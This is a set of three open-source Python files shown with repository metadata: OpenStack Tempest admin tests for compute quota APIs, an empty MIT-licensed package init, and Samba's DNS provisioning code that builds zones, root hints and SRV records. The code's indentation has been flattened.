# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from testtools import matchers
from tempest.api.compute import base
from tempest.common import identity
from tempest.common import tempest_fixtures as fixtures
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
LOG = logging.getLogger(__name__)
class QuotasAdminTestJSON(base.BaseV2ComputeAdminTest):
force_tenant_isolation = True
def setUp(self):
# NOTE(mriedem): Avoid conflicts with os-quota-class-sets tests.
self.useFixture(fixtures.LockFixture('compute_quotas'))
super(QuotasAdminTestJSON, self).setUp()
@classmethod
def setup_clients(cls):
super(QuotasAdminTestJSON, cls).setup_clients()
cls.adm_client = cls.os_admin.quotas_client
@classmethod
def resource_setup(cls):
super(QuotasAdminTestJSON, cls).resource_setup()
# NOTE(afazekas): these test cases should always create and use a new
# tenant most of them should be skipped if we can't do that
cls.demo_tenant_id = cls.quotas_client.tenant_id
cls.default_quota_set = set(('injected_file_content_bytes',
'metadata_items', 'injected_files',
'ram', 'floating_ips',
'fixed_ips', 'key_pairs',
'injected_file_path_bytes',
'instances', 'security_group_rules',
'cores', 'security_groups'))
@decorators.idempotent_id('3b0a7c8f-cf58-46b8-a60c-715a32a8ba7d')
def test_get_default_quotas(self):
# Admin can get the default resource quota set for a tenant
expected_quota_set = self.default_quota_set | set(['id'])
quota_set = self.adm_client.show_default_quota_set(
self.demo_tenant_id)['quota_set']
self.assertEqual(quota_set['id'], self.demo_tenant_id)
for quota in expected_quota_set:
self.assertIn(quota, quota_set.keys())
@decorators.idempotent_id('55fbe2bf-21a9-435b-bbd2-4162b0ed799a')
def test_update_all_quota_resources_for_tenant(self):
# Admin can update all the resource quota limits for a tenant
default_quota_set = self.adm_client.show_default_quota_set(
self.demo_tenant_id)['quota_set']
new_quota_set = {'injected_file_content_bytes': 20480,
'metadata_items': 256, 'injected_files': 10,
'ram': 10240, 'floating_ips': 20, 'fixed_ips': 10,
'key_pairs': 200, 'injected_file_path_bytes': 512,
'instances': 20, 'security_group_rules': 20,
'cores': 2, 'security_groups': 20,
'server_groups': 20, 'server_group_members': 20}
# Update limits for all quota resources
quota_set = self.adm_client.update_quota_set(
self.demo_tenant_id,
force=True,
**new_quota_set)['quota_set']
default_quota_set.pop('id')
self.addCleanup(self.adm_client.update_quota_set,
self.demo_tenant_id, **default_quota_set)
for quota in new_quota_set:
self.assertIn(quota, quota_set.keys())
# TODO(afazekas): merge these test cases
@decorators.idempotent_id('ce9e0815-8091-4abd-8345-7fe5b85faa1d')
def test_get_updated_quotas(self):
# Verify that GET shows the updated quota set of project
project_name = data_utils.rand_name('cpu_quota_project')
project_desc = project_name + '-desc'
project = identity.identity_utils(self.os_admin).create_project(
name=project_name, description=project_desc)
project_id = project['id']
self.addCleanup(identity.identity_utils(self.os_admin).delete_project,
project_id)
self.adm_client.update_quota_set(project_id, ram='5120')
quota_set = self.adm_client.show_quota_set(project_id)['quota_set']
self.assertEqual(5120, quota_set['ram'])
# Verify that GET shows the updated quota set of user
user_name = data_utils.rand_name('cpu_quota_user')
password = data_utils.rand_password()
email = user_name + '@testmail.tm'
user = identity.identity_utils(self.os_admin).create_user(
username=user_name, password=password, project=project,
email=email)
user_id = user['id']
self.addCleanup(identity.identity_utils(self.os_admin).delete_user,
user_id)
self.adm_client.update_quota_set(project_id,
user_id=user_id,
ram='2048')
quota_set = self.adm_client.show_quota_set(
project_id, user_id=user_id)['quota_set']
self.assertEqual(2048, quota_set['ram'])
@decorators.idempotent_id('389d04f0-3a41-405f-9317-e5f86e3c44f0')
def test_delete_quota(self):
# Admin can delete the resource quota set for a project
project_name = data_utils.rand_name('ram_quota_project')
project_desc = project_name + '-desc'
project = identity.identity_utils(self.os_admin).create_project(
name=project_name, description=project_desc)
project_id = project['id']
self.addCleanup(identity.identity_utils(self.os_admin).delete_project,
project_id)
quota_set_default = (self.adm_client.show_quota_set(project_id)
['quota_set'])
ram_default = quota_set_default['ram']
self.adm_client.update_quota_set(project_id, ram='5120')
self.adm_client.delete_quota_set(project_id)
quota_set_new = self.adm_client.show_quota_set(project_id)['quota_set']
self.assertEqual(ram_default, quota_set_new['ram'])
class QuotaClassesAdminTestJSON(base.BaseV2ComputeAdminTest):
"""Tests the os-quota-class-sets API to update default quotas."""
def setUp(self):
# All test cases in this class need to externally lock on doing
# anything with default quota values.
self.useFixture(fixtures.LockFixture('compute_quotas'))
super(QuotaClassesAdminTestJSON, self).setUp()
@classmethod
def resource_setup(cls):
super(QuotaClassesAdminTestJSON, cls).resource_setup()
cls.adm_client = cls.os_admin.quota_classes_client
def _restore_default_quotas(self, original_defaults):
LOG.debug("restoring quota class defaults")
self.adm_client.update_quota_class_set('default', **original_defaults)
# NOTE(sdague): this test is problematic as it changes
# global state, and possibly needs to be part of a set of
# tests that get run all by themselves at the end under a
# 'danger' flag.
@decorators.idempotent_id('7932ab0f-5136-4075-b201-c0e2338df51a')
def test_update_default_quotas(self):
LOG.debug("get the current 'default' quota class values")
body = (self.adm_client.show_quota_class_set('default')
['quota_class_set'])
self.assertEqual('default', body.pop('id'))
# restore the defaults when the test is done
self.addCleanup(self._restore_default_quotas, body.copy())
# increment all of the values for updating the default quota class
for quota, default in body.items():
# NOTE(sdague): we need to increment a lot, otherwise
# there is a real chance that we go from -1 (unlimited)
# to a very small number which causes issues.
body[quota] = default + 100
LOG.debug("update limits for the default quota class set")
update_body = self.adm_client.update_quota_class_set(
'default', **body)['quota_class_set']
LOG.debug("assert that the response has all of the changed values")
self.assertThat(update_body.items(),
matchers.ContainsAll(body.items()))
| Juniper/tempest | tempest/api/compute/admin/test_quotas.py | Python | apache-2.0 | 8,672 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Copyright (c) 2012 Vincent Gauthier.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# -------------------------------------------------------------------------------
| ComplexNetTSP/CooperativeNetworking | complex_systems/spatial/__init__.py | Python | mit | 1,304 |
# Unix SMB/CIFS implementation.
# backend code for provisioning DNS for a Samba4 server
#
# Copyright (C) Kai Blin <kai@samba.org> 2011
# Copyright (C) Amitay Isaacs <amitay@gmail.com> 2011
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""DNS-related provisioning"""
import os
import uuid
import shutil
import time
import ldb
from base64 import b64encode
import subprocess
import samba
from samba.tdb_util import tdb_copy
from samba.ndr import ndr_pack, ndr_unpack
from samba import setup_file
from samba.dcerpc import dnsp, misc, security
from samba.dsdb import (
DS_DOMAIN_FUNCTION_2000,
DS_DOMAIN_FUNCTION_2003,
DS_DOMAIN_FUNCTION_2008_R2,
DS_DOMAIN_FUNCTION_2012_R2
)
from samba.descriptor import (
get_domain_descriptor,
get_domain_delete_protected1_descriptor,
get_domain_delete_protected2_descriptor,
get_dns_partition_descriptor,
get_dns_forest_microsoft_dns_descriptor,
get_dns_domain_microsoft_dns_descriptor
)
from samba.provision.common import (
setup_path,
setup_add_ldif,
setup_modify_ldif,
setup_ldb,
FILL_FULL,
FILL_SUBDOMAIN,
FILL_NT4SYNC,
FILL_DRS,
)
def get_domainguid(samdb, domaindn):
res = samdb.search(base=domaindn, scope=ldb.SCOPE_BASE, attrs=["objectGUID"])
domainguid = str(ndr_unpack(misc.GUID, res[0]["objectGUID"][0]))
return domainguid
def get_dnsadmins_sid(samdb, domaindn):
res = samdb.search(base="CN=DnsAdmins,CN=Users,%s" % domaindn, scope=ldb.SCOPE_BASE,
attrs=["objectSid"])
dnsadmins_sid = ndr_unpack(security.dom_sid, res[0]["objectSid"][0])
return dnsadmins_sid
class ARecord(dnsp.DnssrvRpcRecord):
def __init__(self, ip_addr, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
super(ARecord, self).__init__()
self.wType = dnsp.DNS_TYPE_A
self.rank = rank
self.dwSerial = serial
self.dwTtlSeconds = ttl
self.data = ip_addr
class AAAARecord(dnsp.DnssrvRpcRecord):
def __init__(self, ip6_addr, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
super(AAAARecord, self).__init__()
self.wType = dnsp.DNS_TYPE_AAAA
self.rank = rank
self.dwSerial = serial
self.dwTtlSeconds = ttl
self.data = ip6_addr
class CNameRecord(dnsp.DnssrvRpcRecord):
def __init__(self, cname, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
super(CNameRecord, self).__init__()
self.wType = dnsp.DNS_TYPE_CNAME
self.rank = rank
self.dwSerial = serial
self.dwTtlSeconds = ttl
self.data = cname
class NSRecord(dnsp.DnssrvRpcRecord):
def __init__(self, dns_server, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
super(NSRecord, self).__init__()
self.wType = dnsp.DNS_TYPE_NS
self.rank = rank
self.dwSerial = serial
self.dwTtlSeconds = ttl
self.data = dns_server
class SOARecord(dnsp.DnssrvRpcRecord):
def __init__(self, mname, rname, serial=1, refresh=900, retry=600,
expire=86400, minimum=3600, ttl=3600, rank=dnsp.DNS_RANK_ZONE):
super(SOARecord, self).__init__()
self.wType = dnsp.DNS_TYPE_SOA
self.rank = rank
self.dwSerial = serial
self.dwTtlSeconds = ttl
soa = dnsp.soa()
soa.serial = serial
soa.refresh = refresh
soa.retry = retry
soa.expire = expire
soa.mname = mname
soa.rname = rname
soa.minimum = minimum
self.data = soa
class SRVRecord(dnsp.DnssrvRpcRecord):
def __init__(self, target, port, priority=0, weight=100, serial=1, ttl=900,
rank=dnsp.DNS_RANK_ZONE):
super(SRVRecord, self).__init__()
self.wType = dnsp.DNS_TYPE_SRV
self.rank = rank
self.dwSerial = serial
self.dwTtlSeconds = ttl
srv = dnsp.srv()
srv.nameTarget = target
srv.wPort = port
srv.wPriority = priority
srv.wWeight = weight
self.data = srv
class TXTRecord(dnsp.DnssrvRpcRecord):
def __init__(self, slist, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
super(TXTRecord, self).__init__()
self.wType = dnsp.DNS_TYPE_TXT
self.rank = rank
self.dwSerial = serial
self.dwTtlSeconds = ttl
stringlist = dnsp.string_list()
stringlist.count = len(slist)
stringlist.str = slist
self.data = stringlist
class TypeProperty(dnsp.DnsProperty):
def __init__(self, zone_type=dnsp.DNS_ZONE_TYPE_PRIMARY):
super(TypeProperty, self).__init__()
self.wDataLength = 1
self.version = 1
self.id = dnsp.DSPROPERTY_ZONE_TYPE
self.data = zone_type
class AllowUpdateProperty(dnsp.DnsProperty):
def __init__(self, allow_update=dnsp.DNS_ZONE_UPDATE_SECURE):
super(AllowUpdateProperty, self).__init__()
self.wDataLength = 1
self.version = 1
self.id = dnsp.DSPROPERTY_ZONE_ALLOW_UPDATE
self.data = allow_update
class SecureTimeProperty(dnsp.DnsProperty):
def __init__(self, secure_time=0):
super(SecureTimeProperty, self).__init__()
self.wDataLength = 1
self.version = 1
self.id = dnsp.DSPROPERTY_ZONE_SECURE_TIME
self.data = secure_time
class NorefreshIntervalProperty(dnsp.DnsProperty):
def __init__(self, norefresh_interval=0):
super(NorefreshIntervalProperty, self).__init__()
self.wDataLength = 1
self.version = 1
self.id = dnsp.DSPROPERTY_ZONE_NOREFRESH_INTERVAL
self.data = norefresh_interval
class RefreshIntervalProperty(dnsp.DnsProperty):
def __init__(self, refresh_interval=0):
super(RefreshIntervalProperty, self).__init__()
self.wDataLength = 1
self.version = 1
self.id = dnsp.DSPROPERTY_ZONE_REFRESH_INTERVAL
self.data = refresh_interval
class AgingStateProperty(dnsp.DnsProperty):
def __init__(self, aging_enabled=0):
super(AgingStateProperty, self).__init__()
self.wDataLength = 1
self.version = 1
self.id = dnsp.DSPROPERTY_ZONE_AGING_STATE
self.data = aging_enabled
class AgingEnabledTimeProperty(dnsp.DnsProperty):
def __init__(self, next_cycle_hours=0):
super(AgingEnabledTimeProperty, self).__init__()
self.wDataLength = 1
self.version = 1;
self.id = dnsp.DSPROPERTY_ZONE_AGING_ENABLED_TIME
self.data = next_cycle_hours
def setup_dns_partitions(samdb, domainsid, domaindn, forestdn, configdn,
serverdn, fill_level):
domainzone_dn = "DC=DomainDnsZones,%s" % domaindn
forestzone_dn = "DC=ForestDnsZones,%s" % forestdn
descriptor = get_dns_partition_descriptor(domainsid)
setup_add_ldif(samdb, setup_path("provision_dnszones_partitions.ldif"), {
"ZONE_DN": domainzone_dn,
"SECDESC" : b64encode(descriptor)
})
if fill_level != FILL_SUBDOMAIN:
setup_add_ldif(samdb, setup_path("provision_dnszones_partitions.ldif"), {
"ZONE_DN": forestzone_dn,
"SECDESC" : b64encode(descriptor)
})
domainzone_guid = get_domainguid(samdb, domainzone_dn)
domainzone_guid = str(uuid.uuid4())
domainzone_dns = ldb.Dn(samdb, domainzone_dn).canonical_ex_str().strip()
protected1_desc = get_domain_delete_protected1_descriptor(domainsid)
protected2_desc = get_domain_delete_protected2_descriptor(domainsid)
setup_add_ldif(samdb, setup_path("provision_dnszones_add.ldif"), {
"ZONE_DN": domainzone_dn,
"ZONE_GUID": domainzone_guid,
"ZONE_DNS": domainzone_dns,
"CONFIGDN": configdn,
"SERVERDN": serverdn,
"LOSTANDFOUND_DESCRIPTOR": b64encode(protected2_desc),
"INFRASTRUCTURE_DESCRIPTOR": b64encode(protected1_desc),
})
setup_modify_ldif(samdb, setup_path("provision_dnszones_modify.ldif"), {
"CONFIGDN": configdn,
"SERVERDN": serverdn,
"ZONE_DN": domainzone_dn,
})
if fill_level != FILL_SUBDOMAIN:
forestzone_guid = get_domainguid(samdb, forestzone_dn)
forestzone_guid = str(uuid.uuid4())
forestzone_dns = ldb.Dn(samdb, forestzone_dn).canonical_ex_str().strip()
setup_add_ldif(samdb, setup_path("provision_dnszones_add.ldif"), {
"ZONE_DN": forestzone_dn,
"ZONE_GUID": forestzone_guid,
"ZONE_DNS": forestzone_dns,
"CONFIGDN": configdn,
"SERVERDN": serverdn,
"LOSTANDFOUND_DESCRIPTOR": b64encode(protected2_desc),
"INFRASTRUCTURE_DESCRIPTOR": b64encode(protected1_desc),
})
setup_modify_ldif(samdb, setup_path("provision_dnszones_modify.ldif"), {
"CONFIGDN": configdn,
"SERVERDN": serverdn,
"ZONE_DN": forestzone_dn,
})
def add_dns_accounts(samdb, domaindn):
setup_add_ldif(samdb, setup_path("provision_dns_accounts_add.ldif"), {
"DOMAINDN": domaindn,
})
def add_dns_container(samdb, domaindn, prefix, domain_sid, dnsadmins_sid, forest=False):
name_map = {'DnsAdmins': str(dnsadmins_sid)}
if forest is True:
sd_val = get_dns_forest_microsoft_dns_descriptor(domain_sid,
name_map=name_map)
else:
sd_val = get_dns_domain_microsoft_dns_descriptor(domain_sid,
name_map=name_map)
# CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
msg = ldb.Message(ldb.Dn(samdb, "CN=MicrosoftDNS,%s,%s" % (prefix, domaindn)))
msg["objectClass"] = ["top", "container"]
msg["nTSecurityDescriptor"] = ldb.MessageElement(sd_val, ldb.FLAG_MOD_ADD,
"nTSecurityDescriptor")
samdb.add(msg)
def add_rootservers(samdb, domaindn, prefix):
# https://www.internic.net/zones/named.root
rootservers = {}
rootservers["a.root-servers.net"] = "198.41.0.4"
rootservers["b.root-servers.net"] = "192.228.79.201"
rootservers["c.root-servers.net"] = "192.33.4.12"
rootservers["d.root-servers.net"] = "199.7.91.13"
rootservers["e.root-servers.net"] = "192.203.230.10"
rootservers["f.root-servers.net"] = "192.5.5.241"
rootservers["g.root-servers.net"] = "192.112.36.4"
rootservers["h.root-servers.net"] = "198.97.190.53"
rootservers["i.root-servers.net"] = "192.36.148.17"
rootservers["j.root-servers.net"] = "192.58.128.30"
rootservers["k.root-servers.net"] = "193.0.14.129"
rootservers["l.root-servers.net"] = "199.7.83.42"
rootservers["m.root-servers.net"] = "202.12.27.33"
rootservers_v6 = {}
rootservers_v6["a.root-servers.net"] = "2001:503:ba3e::2:30"
rootservers_v6["b.root-servers.net"] = "2001:500:84::b"
rootservers_v6["c.root-servers.net"] = "2001:500:2::c"
rootservers_v6["d.root-servers.net"] = "2001:500:2d::d"
rootservers_v6["e.root-servers.net"] = "2001:500:a8::e"
rootservers_v6["f.root-servers.net"] = "2001:500:2f::f"
rootservers_v6["g.root-servers.net"] = "2001:500:12::d0d"
rootservers_v6["h.root-servers.net"] = "2001:500:1::53"
rootservers_v6["i.root-servers.net"] = "2001:7fe::53"
rootservers_v6["j.root-servers.net"] = "2001:503:c27::2:30"
rootservers_v6["k.root-servers.net"] = "2001:7fd::1"
rootservers_v6["l.root-servers.net"] = "2001:500:9f::42"
rootservers_v6["m.root-servers.net"] = "2001:dc3::35"
container_dn = "DC=RootDNSServers,CN=MicrosoftDNS,%s,%s" % (prefix, domaindn)
# Add DC=RootDNSServers,CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
msg = ldb.Message(ldb.Dn(samdb, container_dn))
props = []
props.append(ndr_pack(TypeProperty(zone_type=dnsp.DNS_ZONE_TYPE_CACHE)))
props.append(ndr_pack(AllowUpdateProperty(allow_update=dnsp.DNS_ZONE_UPDATE_OFF)))
props.append(ndr_pack(SecureTimeProperty()))
props.append(ndr_pack(NorefreshIntervalProperty()))
props.append(ndr_pack(RefreshIntervalProperty()))
props.append(ndr_pack(AgingStateProperty()))
props.append(ndr_pack(AgingEnabledTimeProperty()))
msg["objectClass"] = ["top", "dnsZone"]
msg["cn"] = ldb.MessageElement("Zone", ldb.FLAG_MOD_ADD, "cn")
msg["dNSProperty"] = ldb.MessageElement(props, ldb.FLAG_MOD_ADD, "dNSProperty")
samdb.add(msg)
# Add DC=@,DC=RootDNSServers,CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
record = []
for rserver in rootservers:
record.append(ndr_pack(NSRecord(rserver, serial=0, ttl=0, rank=dnsp.DNS_RANK_ROOT_HINT)))
msg = ldb.Message(ldb.Dn(samdb, "DC=@,%s" % container_dn))
msg["objectClass"] = ["top", "dnsNode"]
msg["dnsRecord"] = ldb.MessageElement(record, ldb.FLAG_MOD_ADD, "dnsRecord")
samdb.add(msg)
# Add DC=<rootserver>,DC=RootDNSServers,CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
for rserver in rootservers:
record = [ndr_pack(ARecord(rootservers[rserver], serial=0, ttl=0, rank=dnsp.DNS_RANK_ROOT_HINT))]
# Add AAAA record as well (How does W2K* add IPv6 records?)
#if rserver in rootservers_v6:
# record.append(ndr_pack(AAAARecord(rootservers_v6[rserver], serial=0, ttl=0)))
msg = ldb.Message(ldb.Dn(samdb, "DC=%s,%s" % (rserver, container_dn)))
msg["objectClass"] = ["top", "dnsNode"]
msg["dnsRecord"] = ldb.MessageElement(record, ldb.FLAG_MOD_ADD, "dnsRecord")
samdb.add(msg)
def add_at_record(samdb, container_dn, prefix, hostname, dnsdomain, hostip, hostip6):
fqdn_hostname = "%s.%s" % (hostname, dnsdomain)
at_records = []
# SOA record
at_soa_record = SOARecord(fqdn_hostname, "hostmaster.%s" % dnsdomain)
at_records.append(ndr_pack(at_soa_record))
# NS record
at_ns_record = NSRecord(fqdn_hostname)
at_records.append(ndr_pack(at_ns_record))
if hostip is not None:
# A record
at_a_record = ARecord(hostip)
at_records.append(ndr_pack(at_a_record))
if hostip6 is not None:
# AAAA record
at_aaaa_record = AAAARecord(hostip6)
at_records.append(ndr_pack(at_aaaa_record))
msg = ldb.Message(ldb.Dn(samdb, "DC=@,%s" % container_dn))
msg["objectClass"] = ["top", "dnsNode"]
msg["dnsRecord"] = ldb.MessageElement(at_records, ldb.FLAG_MOD_ADD, "dnsRecord")
samdb.add(msg)
def add_srv_record(samdb, container_dn, prefix, host, port):
srv_record = SRVRecord(host, port)
msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
msg["objectClass"] = ["top", "dnsNode"]
msg["dnsRecord"] = ldb.MessageElement(ndr_pack(srv_record), ldb.FLAG_MOD_ADD, "dnsRecord")
samdb.add(msg)
def add_ns_record(samdb, container_dn, prefix, host):
ns_record = NSRecord(host)
msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
msg["objectClass"] = ["top", "dnsNode"]
msg["dnsRecord"] = ldb.MessageElement(ndr_pack(ns_record), ldb.FLAG_MOD_ADD, "dnsRecord")
samdb.add(msg)
def add_ns_glue_record(samdb, container_dn, prefix, host):
ns_record = NSRecord(host, rank=dnsp.DNS_RANK_NS_GLUE)
msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
msg["objectClass"] = ["top", "dnsNode"]
msg["dnsRecord"] = ldb.MessageElement(ndr_pack(ns_record), ldb.FLAG_MOD_ADD, "dnsRecord")
samdb.add(msg)
def add_cname_record(samdb, container_dn, prefix, host):
cname_record = CNameRecord(host)
msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
msg["objectClass"] = ["top", "dnsNode"]
msg["dnsRecord"] = ldb.MessageElement(ndr_pack(cname_record), ldb.FLAG_MOD_ADD, "dnsRecord")
samdb.add(msg)
def add_host_record(samdb, container_dn, prefix, hostip, hostip6):
host_records = []
if hostip:
a_record = ARecord(hostip)
host_records.append(ndr_pack(a_record))
if hostip6:
aaaa_record = AAAARecord(hostip6)
host_records.append(ndr_pack(aaaa_record))
if host_records:
msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
msg["objectClass"] = ["top", "dnsNode"]
msg["dnsRecord"] = ldb.MessageElement(host_records, ldb.FLAG_MOD_ADD, "dnsRecord")
samdb.add(msg)
def add_domain_record(samdb, domaindn, prefix, dnsdomain, domainsid, dnsadmins_sid):
# DC=<DNSDOMAIN>,CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
sddl = "O:SYG:BAD:AI" \
"(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" \
"(A;;CC;;;AU)" \
"(A;;RPLCLORC;;;WD)" \
"(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)" \
"(A;CI;RPWPCRCCDCLCRCWOWDSDDTSW;;;ED)" \
"(A;CIID;RPWPCRCCDCLCRCWOWDSDDTSW;;;%s)" \
"(A;CIID;RPWPCRCCDCLCRCWOWDSDDTSW;;;ED)" \
"(OA;CIID;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)" \
"(A;CIID;RPWPCRCCDCLCLORCWOWDSDDTSW;;;EA)" \
"(A;CIID;LC;;;RU)" \
"(A;CIID;RPWPCRCCLCLORCWOWDSDSW;;;BA)" \
"S:AI" % dnsadmins_sid
sec = security.descriptor.from_sddl(sddl, domainsid)
props = []
props.append(ndr_pack(TypeProperty()))
props.append(ndr_pack(AllowUpdateProperty()))
props.append(ndr_pack(SecureTimeProperty()))
props.append(ndr_pack(NorefreshIntervalProperty(norefresh_interval=168)))
props.append(ndr_pack(RefreshIntervalProperty(refresh_interval=168)))
props.append(ndr_pack(AgingStateProperty()))
props.append(ndr_pack(AgingEnabledTimeProperty()))
msg = ldb.Message(ldb.Dn(samdb, "DC=%s,CN=MicrosoftDNS,%s,%s" % (dnsdomain, prefix, domaindn)))
msg["objectClass"] = ["top", "dnsZone"]
msg["ntSecurityDescriptor"] = ldb.MessageElement(ndr_pack(sec), ldb.FLAG_MOD_ADD,
"nTSecurityDescriptor")
msg["dNSProperty"] = ldb.MessageElement(props, ldb.FLAG_MOD_ADD, "dNSProperty")
samdb.add(msg)
def add_msdcs_record(samdb, forestdn, prefix, dnsforest):
# DC=_msdcs.<DNSFOREST>,CN=MicrosoftDNS,<PREFIX>,<FORESTDN>
msg = ldb.Message(ldb.Dn(samdb, "DC=_msdcs.%s,CN=MicrosoftDNS,%s,%s" %
(dnsforest, prefix, forestdn)))
msg["objectClass"] = ["top", "dnsZone"]
samdb.add(msg)
def add_dc_domain_records(samdb, domaindn, prefix, site, dnsdomain, hostname,
hostip, hostip6):
fqdn_hostname = "%s.%s" % (hostname, dnsdomain)
# Set up domain container - DC=<DNSDOMAIN>,CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
domain_container_dn = ldb.Dn(samdb, "DC=%s,CN=MicrosoftDNS,%s,%s" %
(dnsdomain, prefix, domaindn))
# DC=@ record
add_at_record(samdb, domain_container_dn, "DC=@", hostname, dnsdomain,
hostip, hostip6)
# DC=<HOSTNAME> record
add_host_record(samdb, domain_container_dn, "DC=%s" % hostname, hostip,
hostip6)
# DC=_kerberos._tcp record
add_srv_record(samdb, domain_container_dn, "DC=_kerberos._tcp",
fqdn_hostname, 88)
# DC=_kerberos._tcp.<SITENAME>._sites record
add_srv_record(samdb, domain_container_dn, "DC=_kerberos._tcp.%s._sites" %
site, fqdn_hostname, 88)
# DC=_kerberos._udp record
add_srv_record(samdb, domain_container_dn, "DC=_kerberos._udp",
fqdn_hostname, 88)
# DC=_kpasswd._tcp record
add_srv_record(samdb, domain_container_dn, "DC=_kpasswd._tcp",
fqdn_hostname, 464)
# DC=_kpasswd._udp record
add_srv_record(samdb, domain_container_dn, "DC=_kpasswd._udp",
fqdn_hostname, 464)
# DC=_ldap._tcp record
add_srv_record(samdb, domain_container_dn, "DC=_ldap._tcp", fqdn_hostname,
389)
# DC=_ldap._tcp.<SITENAME>._sites record
add_srv_record(samdb, domain_container_dn, "DC=_ldap._tcp.%s._sites" %
site, fqdn_hostname, 389)
# FIXME: The number of SRV records depend on the various roles this DC has.
# _gc and _msdcs records are added if the we are the forest dc and not subdomain dc
#
# Assumption: current DC is GC and add all the entries
# DC=_gc._tcp record
add_srv_record(samdb, domain_container_dn, "DC=_gc._tcp", fqdn_hostname,
3268)
# DC=_gc._tcp.<SITENAME>,_sites record
add_srv_record(samdb, domain_container_dn, "DC=_gc._tcp.%s._sites" % site,
fqdn_hostname, 3268)
# DC=_msdcs record
add_ns_glue_record(samdb, domain_container_dn, "DC=_msdcs", fqdn_hostname)
# FIXME: Following entries are added only if DomainDnsZones and ForestDnsZones partitions
# are created
#
# Assumption: Additional entries won't hurt on os_level = 2000
# DC=_ldap._tcp.<SITENAME>._sites.DomainDnsZones
add_srv_record(samdb, domain_container_dn,
"DC=_ldap._tcp.%s._sites.DomainDnsZones" % site, fqdn_hostname,
389)
# DC=_ldap._tcp.<SITENAME>._sites.ForestDnsZones
add_srv_record(samdb, domain_container_dn,
"DC=_ldap._tcp.%s._sites.ForestDnsZones" % site, fqdn_hostname,
389)
# DC=_ldap._tcp.DomainDnsZones
add_srv_record(samdb, domain_container_dn, "DC=_ldap._tcp.DomainDnsZones",
fqdn_hostname, 389)
# DC=_ldap._tcp.ForestDnsZones
add_srv_record(samdb, domain_container_dn, "DC=_ldap._tcp.ForestDnsZones",
fqdn_hostname, 389)
# DC=DomainDnsZones
add_host_record(samdb, domain_container_dn, "DC=DomainDnsZones", hostip,
hostip6)
# DC=ForestDnsZones
add_host_record(samdb, domain_container_dn, "DC=ForestDnsZones", hostip,
hostip6)
def add_dc_msdcs_records(samdb, forestdn, prefix, site, dnsforest, hostname,
hostip, hostip6, domainguid, ntdsguid):
fqdn_hostname = "%s.%s" % (hostname, dnsforest)
# Set up forest container - DC=<DNSDOMAIN>,CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
forest_container_dn = ldb.Dn(samdb, "DC=_msdcs.%s,CN=MicrosoftDNS,%s,%s" %
(dnsforest, prefix, forestdn))
# DC=@ record
add_at_record(samdb, forest_container_dn, "DC=@", hostname, dnsforest,
None, None)
# DC=_kerberos._tcp.dc record
add_srv_record(samdb, forest_container_dn, "DC=_kerberos._tcp.dc",
fqdn_hostname, 88)
# DC=_kerberos._tcp.<SITENAME>._sites.dc record
add_srv_record(samdb, forest_container_dn,
"DC=_kerberos._tcp.%s._sites.dc" % site, fqdn_hostname, 88)
# DC=_ldap._tcp.dc record
add_srv_record(samdb, forest_container_dn, "DC=_ldap._tcp.dc",
fqdn_hostname, 389)
# DC=_ldap._tcp.<SITENAME>._sites.dc record
add_srv_record(samdb, forest_container_dn, "DC=_ldap._tcp.%s._sites.dc" %
site, fqdn_hostname, 389)
# DC=_ldap._tcp.<SITENAME>._sites.gc record
add_srv_record(samdb, forest_container_dn, "DC=_ldap._tcp.%s._sites.gc" %
site, fqdn_hostname, 3268)
# DC=_ldap._tcp.gc record
add_srv_record(samdb, forest_container_dn, "DC=_ldap._tcp.gc",
fqdn_hostname, 3268)
